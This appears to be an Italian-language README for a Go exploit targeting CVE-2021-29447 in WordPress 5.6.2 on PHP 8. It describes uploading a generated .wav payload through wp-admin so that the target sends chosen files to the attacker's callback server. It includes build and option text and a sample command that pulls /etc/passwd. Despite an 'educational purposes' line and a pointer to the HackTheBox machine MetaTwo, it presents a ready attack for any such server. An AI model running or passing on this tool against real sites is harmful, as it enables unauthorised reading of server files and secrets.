
Solo per scopi educativi.
Questo exploit dovrebbe essere uno strumento davvero comodo per ottenere qualsiasi file da un server che esegue WordPress 5.6.2 e PHP 8. (vedi https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5)
Tutto ciò di cui hai bisogno è l'accesso base a wp-admin e la possibilità di caricare un file multimediale.
L'exploit genererà un file payload .wav da caricare tramite wp-admin.
Poi usa il server di ritorno dell'exploit per darti il file desiderato direttamente sulla tua console.
L'uso perfetto è la macchina di HackTheBox - metatwo https://www.hackthebox.com/machines/metatwo

$ go build
$ chmod +x exploit_cve-2021-29447
$ ./exploit_cve-2021-29447 --help
Usage of ./exploit_cve-2021-29447:
-local-server-ip string
Usa l'IP del server locale dove verrà configurato un server locale
-local-server-port int
Usa la porta del server locale su cui far girare il server locale
-o string
File di output in cui salvare il risultato dell'exploit
-target-path string
Usa il percorso target per indicare il file che vuoi ottenere dal server di destinazione
$ ./exploit_cve-2021-29447 -local-server-ip=<il tuo indirizzo IP> -target-path=/etc/passwd